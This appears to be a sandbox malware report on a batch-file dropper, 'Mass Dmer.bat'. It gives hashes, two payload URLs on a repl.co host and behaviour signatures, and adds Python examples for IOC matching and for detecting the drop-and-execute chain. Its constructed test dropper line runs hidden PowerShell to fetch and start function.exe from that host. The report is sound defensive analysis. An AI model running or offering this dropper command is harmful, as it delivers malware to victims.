General

  • Target

    Mass Dmer.bat

  • Size

    1KB

  • Sample

    231111-lcczqscg71

  • MD5

    5ac8897ff732070a7ffe9147c599e01e

  • SHA1

    39db3eccc2d8a1e06038282c49c6af405cf44431

  • SHA256

    0ad689faa00e511421c71ea560cb430a29c4de5572c8be8b8f1df2974bce02b5

  • SHA512

    7951c6f9d2fdf3450fdc76befca65587aa2c13fec385afa272f2359d8778379e9cebf9fdcc06ce636b162f1505d15ae15aa165deb1bac748eaba275891fb1c0b

Score
10/10

Malware Config

  • Extracted (deobfuscated)

    Language: ps1
    URLs (exe.dropper): https://rooptimizer.windowsupdates.repl.co/Uni.bat

  • Extracted (deobfuscated)

    Language: ps1
    URLs (exe.dropper): https://rooptimizer.windowsupdates.repl.co/function.exe

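The two download URLs and the file hashes above are the report's actionable indicators. The following Python is an added example, not sandbox output and not the sample's own code: it turns those indicators into a hash check, a URL extractor for batch/PowerShell text, and a proxy-log sweep. The dropper text and log lines embedded in it are constructed stand-ins for testing, not the real sample's contents.

```python
"""
IOC matcher for the indicators in this report.
Added example: not output of the sandbox and not code from the sample.
The hashes and URLs are copied from the report; SAMPLE_DROPPER and
SAMPLE_PROXY_LOG are constructed test input, not the real sample.
"""
import hashlib
import re
from urllib.parse import urlparse

# File hashes reported for "Mass Dmer.bat".
IOC_HASHES = {
    "md5": "5ac8897ff732070a7ffe9147c599e01e",
    "sha1": "39db3eccc2d8a1e06038282c49c6af405cf44431",
    "sha256": "0ad689faa00e511421c71ea560cb430a29c4de5572c8be8b8f1df2974bce02b5",
}
# Download URLs extracted from the embedded PowerShell stage.
IOC_URLS = {
    "https://rooptimizer.windowsupdates.repl.co/Uni.bat",
    "https://rooptimizer.windowsupdates.repl.co/function.exe",
}
IOC_HOSTS = {urlparse(u).hostname for u in IOC_URLS}

URL_RE = re.compile(r"https?://[^\s\"'<>;)]+", re.IGNORECASE)


def hash_bytes(data: bytes) -> dict:
    """md5/sha1/sha256 hex digests so a file can be compared with the report."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def matches_sample(data: bytes) -> bool:
    """True if the bytes hash to the reported sample under any of the digests."""
    digests = hash_bytes(data)
    return any(digests[algo] == value for algo, value in IOC_HASHES.items())


def extract_urls(text: str) -> list:
    """Pull http(s) URLs out of batch/PowerShell text, in order, de-duplicated."""
    seen, out = set(), []
    for url in URL_RE.findall(text):
        url = url.rstrip(".,")
        if url not in seen:
            seen.add(url)
            out.append(url)
    return out


def classify_urls(urls) -> dict:
    """Split URLs into exact IOC hits, same-host hits, and unrelated URLs."""
    result = {"exact": [], "host": [], "other": []}
    for url in urls:
        if url in IOC_URLS:
            result["exact"].append(url)
        elif urlparse(url).hostname in IOC_HOSTS:
            result["host"].append(url)
        else:
            result["other"].append(url)
    return result


def scan_proxy_log(lines) -> list:
    """Return (line_no, url) for proxy log lines that reach an IOC host."""
    hits = []
    for n, line in enumerate(lines, 1):
        for url in extract_urls(line):
            if urlparse(url).hostname in IOC_HOSTS:
                hits.append((n, url))
    return hits


# Constructed stand-in for a dropper of this shape; NOT the real sample's content.
SAMPLE_DROPPER = (
    "@echo off\r\n"
    'powershell -w hidden -c "iwr https://rooptimizer.windowsupdates.repl.co/Uni.bat '
    "-OutFile %temp%\\Uni.bat; iwr https://rooptimizer.windowsupdates.repl.co/function.exe "
    '-OutFile %temp%\\function.exe; start %temp%\\function.exe"\r\n'
)

# Constructed proxy log lines (not from any real environment).
SAMPLE_PROXY_LOG = [
    "2023-11-11T12:00:01Z 10.0.0.5 GET https://update.example.com/catalog.xml 200",
    "2023-11-11T12:00:07Z 10.0.0.5 GET https://rooptimizer.windowsupdates.repl.co/Uni.bat 200",
    "2023-11-11T12:00:09Z 10.0.0.5 GET https://rooptimizer.windowsupdates.repl.co/stage2.bin 404",
]

if __name__ == "__main__":
    print("dropper urls:", classify_urls(extract_urls(SAMPLE_DROPPER)))
    print("proxy hits:", scan_proxy_log(SAMPLE_PROXY_LOG))
    print("constructed text hashes to sample:", matches_sample(SAMPLE_DROPPER.encode()))
```

Matching on the host (IOC_HOSTS) as well as the exact URL is deliberate: a second-stage fetch from the same repl.co host that the sandbox run did not capture would be missed by exact-URL matching alone.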
Targets

    • Target

      Mass Dmer.bat

    Score
    10/10

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Suspicious use of SetThreadContext

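The signatures above describe a chain: a script host (the .bat launching PowerShell) makes a network request, writes an MZ/PE file, and that file is then executed. The following Python is an added example, not part of the report, of correlating that chain over Sysmon-style events. The events, their field names and the `magic` header field are this example's own constructed schema, not a real product's. Because the report also flags NtCreateUserProcess with a different parent, the correlation keys on the dropped file path rather than on parent PID, and only records whether the parent matched.

```python
"""
Correlate the drop-and-execute chain flagged in this report:
script host -> network request -> MZ/PE written -> that PE executed.
Added example with constructed events; not sandbox output and not the
sample's code. Field names ("type", "magic", ...) are assumptions of this
example, not a real telemetry schema.
"""

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def correlate_drop_and_execute(events):
    """One alert per process started from a PE that a script host wrote after
    making a network connection. Keyed on the dropped path, not on PPID, so a
    dropper that spoofs its child's parent still produces an alert; the alert
    records whether the reported parent was the dropper."""
    net = {}      # script-host pid -> set of destination hosts
    dropped = {}  # lower-cased path of MZ file -> pid of script host that wrote it
    hosts = {}    # pid -> image name, script hosts only
    alerts = []
    for ev in events:
        kind, pid = ev["type"], ev["pid"]
        if kind == "process_create":
            name = image_name(ev["image"])
            if name in SCRIPT_HOSTS:
                hosts[pid] = name
            dropper = dropped.get(ev["image"].lower())
            if dropper is not None and net.get(dropper):
                alerts.append({
                    "pid": pid,
                    "executed": ev["image"],
                    "dropper_pid": dropper,
                    "dropper": hosts[dropper],
                    "hosts": sorted(net[dropper]),
                    "parent_matches": ev["ppid"] == dropper,
                })
        elif kind == "network_connect" and pid in hosts:
            net.setdefault(pid, set()).add(ev["dest_host"])
        elif kind == "file_create" and pid in hosts and ev.get("magic") == "MZ":
            dropped[ev["path"].lower()] = pid
    return alerts


# Constructed event stream (not real telemetry). pid 10 stands in for explorer.exe.
EVENTS = [
    {"type": "process_create", "pid": 100, "ppid": 10,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": 'cmd /c "Mass Dmer.bat"'},
    {"type": "process_create", "pid": 101, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c ..."},
    {"type": "network_connect", "pid": 101,
     "dest_host": "rooptimizer.windowsupdates.repl.co", "dest_port": 443},
    {"type": "file_create", "pid": 101,
     "path": r"C:\Users\user\AppData\Local\Temp\Uni.bat", "magic": "@e"},
    {"type": "file_create", "pid": 101,
     "path": r"C:\Users\user\AppData\Local\Temp\function.exe", "magic": "MZ"},
    # Parent reported as pid 10, not the PowerShell that wrote the file:
    # what a spoofed parent looks like in the log.
    {"type": "process_create", "pid": 102, "ppid": 10,
     "image": r"C:\Users\user\AppData\Local\Temp\function.exe", "cmdline": "function.exe"},
    {"type": "process_create", "pid": 103, "ppid": 10,
     "image": r"C:\Program Files\Vendor\app.exe", "cmdline": "app.exe"},
]

if __name__ == "__main__":
    for alert in correlate_drop_and_execute(EVENTS):
        print(alert)
```

The Uni.bat write is ignored because it is not an MZ file, and app.exe is ignored because no script host wrote it; only function.exe, written by the PowerShell process that talked to the repl.co host, raises an alert, with parent_matches False showing the parent mismatch.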
MITRE ATT&CK Enterprise v15